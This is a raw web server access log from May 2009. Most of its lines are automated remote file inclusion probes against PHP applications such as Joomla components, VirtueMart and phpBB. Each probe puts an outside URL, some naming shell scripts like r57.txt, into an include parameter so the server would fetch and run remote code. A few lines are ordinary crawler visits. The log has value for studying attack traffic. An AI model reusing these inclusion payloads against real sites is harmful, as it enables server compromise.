218.27.203.107 - - [17/May/2009:10:48:46 -0500] "GET /logs/access_log.1230336000//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:49:52 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
209.200.8.89 - - [17/May/2009:10:49:53 -0500] "GET //e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:10:49:53 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:10:50:25 -0500] "GET //e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:10:50:27 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
65.55.208.134 - - [17/May/2009:10:51:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [17/May/2009:10:51:17 -0500] "GET /logs/access_log.1240790400 HTTP/1.1" 200 514967 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.27.203.107 - - [17/May/2009:10:51:52 -0500] "GET /logs/access_log.1240358400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 383 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:51:53 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:51:53 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:52:09 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:52:10 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:52:58 -0500] "GET /logs/access_log.1240358400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 383 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:52:58 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:52:58 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:53:33 -0500] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
217.152.200.46 - - [17/May/2009:10:53:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.813"
217.152.200.46 - - [17/May/2009:10:53:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.813"
218.27.203.107 - - [17/May/2009:10:54:45 -0500] "GET /logs/access_log.1233187200//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:56:06 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
217.152.200.46 - - [17/May/2009:10:59:40 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
217.152.200.46 - - [17/May/2009:10:59:40 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.813"
58.227.193.198 - - [17/May/2009:10:59:57 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:10:59:57 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:10:59:57 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.152.200.46 - - [17/May/2009:11:00:05 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.813"
217.152.200.46 - - [17/May/2009:11:00:05 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.813"
58.227.193.198 - - [17/May/2009:11:00:45 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.152.200.46 - - [17/May/2009:11:02:06 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.813"
217.152.200.46 - - [17/May/2009:11:02:06 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.813"
69.59.21.101 - - [17/May/2009:11:04:24 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:11:04:24 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:11:04:24 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:11:04:24 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.191.102.117 - - [17/May/2009:11:12:15 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.191.102.117 - - [17/May/2009:11:12:15 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.191.102.117 - - [17/May/2009:11:12:15 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.191.102.117 - - [17/May/2009:11:12:15 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:11:15:14 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:11:15:14 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:11:15:14 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:11:15:14 -0500] "GET /logs/access_log.1236124800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.106.244 - - [17/May/2009:11:21:02 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
163.24.136.10 - - [17/May/2009:11:21:07 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gtev-inzell.de//redaxo/include//generated/id2x.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
163.24.136.10 - - [17/May/2009:11:21:07 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gtev-inzell.de//redaxo/include//generated/id2x.txt?%0D?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
65.55.106.244 - - [17/May/2009:11:21:59 -0500] "GET /logs/access_log.1129593600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.37.11 - - [17/May/2009:11:23:29 -0500] "GET /logs/access_log.1238112000//maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:11:23:29 -0500] "GET //maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:11:23:29 -0500] "GET /logs//maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.55.182.200 - - [17/May/2009:11:23:39 -0500] "GET //////////?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 3253 "-""libwww-perl/5.805"
72.55.182.200 - - [17/May/2009:11:23:39 -0500] "GET /logs//////////?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 189711 "-""libwww-perl/5.805"
88.84.147.205 - - [17/May/2009:11:27:00 -0500] "GET /logs//maillist/inc/initdb.php?absolute_path=http://www.justsarah.de/portal/contenido/includes/test.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
88.84.147.205 - - [17/May/2009:11:27:00 -0500] "GET //maillist/inc/initdb.php?absolute_path=http://www.justsarah.de/portal/contenido/includes/test.txt?%0D? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
221.139.104.104 - - [17/May/2009:11:28:24 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:11:28:24 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:11:28:24 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:11:28:26 -0500] "GET /logs/access_log.1240617600//maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:11:28:36 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.106.206 - - [17/May/2009:11:30:19 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.206 - - [17/May/2009:11:31:30 -0500] "GET /logs/access_log.1118534400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.118.90.253 - - [17/May/2009:11:32:00 -0500] "GET /logs/dbase.php?action=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:11:32:00 -0500] "GET /dbase.php?action=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.823"
66.219.97.207 - - [17/May/2009:11:34:26 -0500] "GET /logs/dbase.php?action=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:11:34:26 -0500] "GET /dbase.php?action=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
218.150.79.146 - - [17/May/2009:11:34:40 -0500] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:34:40 -0500] "GET //modules/Forums/admin/index.php?phpbb_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:34:40 -0500] "GET /logs/access_log.1240012800//modules/Forums/admin/index.php?phpbb_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:34:40 -0500] "GET /logs/access_log.1238803200//modules/Forums/admin/index.php?phpbb_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:35:12 -0500] "GET /logs//maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:35:12 -0500] "GET /logs/access_log.1238112000//maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:35:12 -0500] "GET //maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:35:18 -0500] "GET /logs/access_log.1240617600//maillist/inc/initdb.php?absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:11:39:35 -0500] "GET /logs//errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:11:39:35 -0500] "GET //errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:11:39:35 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.205.103.164 - - [17/May/2009:11:39:35 -0500] "GET /logs/access_log.1225843200//errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.90.91.245 - - [17/May/2009:11:40:15 -0500] "GET /logs/dbase.php?action=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:11:40:15 -0500] "GET /dbase.php?action=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.822"
189.47.9.163 - - [17/May/2009:11:42:10 -0500] "GET /logs/access_log.1239494400http://br.geocities.com/vagabunss/bot.txt? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
213.171.225.234 - - [17/May/2009:11:42:35 -0500] "GET /logs//shoutbox/expanded.php?conf=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
213.171.225.234 - - [17/May/2009:11:42:36 -0500] "GET //shoutbox/expanded.php?conf=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
79.45.98.65 - - [17/May/2009:11:42:57 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:11:42:57 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.826"
200.107.138.34 - - [17/May/2009:11:43:07 -0500] "GET /logs//shoutbox/expanded.php?conf=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:11:43:08 -0500] "GET //shoutbox/expanded.php?conf=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:48:21 -0500] "GET /logs//shoutbox/expanded.php?conf=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:48:21 -0500] "GET //shoutbox/expanded.php?conf=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
218.150.79.146 - - [17/May/2009:11:49:31 -0500] "GET ///components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:49:31 -0500] "GET /logs/access_log.1239926400///components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:11:49:31 -0500] "GET /logs///components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
24.39.162.98 - - [17/May/2009:11:53:01 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:53:01 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:53:04 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:53:04 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:55:03 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:11:55:03 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
213.171.225.234 - - [17/May/2009:11:55:40 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
213.171.225.234 - - [17/May/2009:11:55:41 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
67.19.50.178 - - [17/May/2009:11:55:58 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.19.50.178 - - [17/May/2009:11:55:58 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
200.107.138.34 - - [17/May/2009:11:56:42 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:11:56:42 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
66.249.67.180 - - [17/May/2009:12:03:41 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Googlebot-Image/1.0"
66.249.67.180 - - [17/May/2009:12:03:41 -0500] "GET /borg_machine3.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
209.200.8.89 - - [17/May/2009:12:05:11 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
201.134.110.45 - - [17/May/2009:12:05:12 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
201.134.110.45 - - [17/May/2009:12:05:12 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
209.200.8.89 - - [17/May/2009:12:05:17 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
69.59.21.101 - - [17/May/2009:12:06:34 -0500] "GET //newsletter/maillist/inc/initdb.php?absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:06:34 -0500] "GET /logs//newsletter/maillist/inc/initdb.php?absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:06:34 -0500] "GET /logs/access_log.1240617600//newsletter/maillist/inc/initdb.php?absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:06:34 -0500] "GET /logs/access_log.1238112000//newsletter/maillist/inc/initdb.php?absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.214.24.22 - - [17/May/2009:12:07:10 -0500] "GET /logs//components/errors.php?error=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
85.214.24.22 - - [17/May/2009:12:07:10 -0500] "GET //components/errors.php?error=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
89.111.189.11 - - [17/May/2009:12:07:45 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:12:07:45 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:12:07:45 -0500] "GET /logs/access_log.1236124800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:07:45 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:07:45 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:12:07:45 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:07:51 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:08:06 -0500] "GET /home.php?index=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 291 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
65.98.59.178 - - [17/May/2009:12:08:08 -0500] "GET //include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:08:08 -0500] "GET /logs//include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:08:08 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:08:28 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:12:08:36 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
213.251.169.156 - - [17/May/2009:12:08:48 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://r3load3d.oltreirc.net/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
